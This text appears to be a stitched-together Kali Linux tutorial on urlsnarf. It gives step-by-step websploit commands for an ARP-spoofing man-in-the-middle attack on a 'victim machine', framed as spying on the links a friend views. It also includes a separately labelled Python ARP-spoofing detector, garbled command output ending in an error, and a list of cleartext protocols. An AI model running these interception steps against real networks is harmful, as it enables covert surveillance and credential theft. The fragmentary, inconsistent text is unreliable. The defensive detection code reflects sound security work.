Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).
URLSnarf - Kali Linux Tool Used for Sniffing on a Network
A MITM (man-in-the-middle) attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Install websploit in Kali if it is not already present.
root@kali:~# apt-get install websploit
Step 2: Run websploit.
Step 3: List the modules available in websploit.
wsf > show modules
Step 4: Select network/mitm under the Network modules.
wsf > use network/mitm
wsf:MITM > show options
Interface: Specify the network interface that matches your network adapter.
set Interface eth0
set Interface wlan0
Router: Specify the router IP, which can be found with the command route -n.
set Router (Gateway IP)
Target: The victim machine's IP address, which can be found with ipconfig on Windows and ifconfig on Linux.
Step 5: Everything is set, so now run the sniffer. Once it runs, IP forwarding and ARP spoofing take place, and after that the sniffers start up.
wsf:MITM > run
Step 6: Now go to the victim machine and start surfing; all the images will be captured by urlsnarf.
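The ARP spoofing that Step 5 starts leaves a trace in the neighbour table of the targeted host: the gateway's IP resolves to the same MAC address as another host on the LAN. The following is an added example, not part of the original tutorial, that checks `ip neigh show` output for that condition; the gateway IP 192.168.1.1, the host 192.168.1.25 and all MAC addresses are constructed sample values.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output taken on a LAN host while
# ARP spoofing is active: the gateway and another host share one MAC.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.6 dev eth0 lladdr 52:54:00:12:34:56 STALE
192.168.1.25 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.40 dev eth0  FAILED
fe80::1 dev eth0 lladdr 00:11:22:33:44:55 router STALE
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

def parse_neighbors(text):
    """Return (ip, dev, mac) tuples for entries that have a resolved MAC."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries carry no lladdr and are skipped
            entries.append((m["ip"], m["dev"], m["mac"].lower()))
    return entries

def find_arp_conflicts(text, gateway_ip):
    """Flag MACs claimed by more than one IPv4 address on one interface."""
    by_mac = defaultdict(set)
    for ip, dev, mac in parse_neighbors(text):
        if ":" not in ip:  # IPv4 only; IPv6 neighbours use NDP, not ARP
            by_mac[(dev, mac)].add(ip)
    findings = []
    for (dev, mac), ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append({
                "dev": dev, "mac": mac, "ips": sorted(ips),
                "gateway_affected": gateway_ip in ips,
            })
    return findings

if __name__ == "__main__":
    for f in find_arp_conflicts(SAMPLE_NEIGH, "192.168.1.1"):
        sev = "HIGH" if f["gateway_affected"] else "review"
        print(f"[{sev}] {f['mac']} on {f['dev']} answers for {', '.join(f['ips'])}")
```

A shared MAC is not always hostile (a router with several addresses or proxy ARP produces the same pattern), so a finding that involves the gateway should be confirmed against the gateway's known hardware address.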
URLSnarf – Tool Used to Capture Website Links That Your Friend Is Viewing Online
urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]
akash@hackersTreeHouse:~$ sudo urlsnarf -i eth0 -v -p cap.pcap
urlsnarf: using cap.pcap [tcp port 80 or port 8080 or port 3128]
192.168.1.18 - - [16/Nov/2015:15:10:38 +0530] "GET http://192.168.1.6/img/for HTTP/1.1" - - "http://192.168.1.6/img/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
rc = -1
pcap_read_ex(): bogus savefile header
Protocols Vulnerable to Sniffing
HTTP: Sends passwords in clear text
TELNET: Transfers commands in plain text
SNMP: Sends passwords in clear text
POP: Sends passwords in clear text
FTP: Sends passwords in clear text
NNTP: Sends passwords in clear text
IMAP: Sends passwords in clear text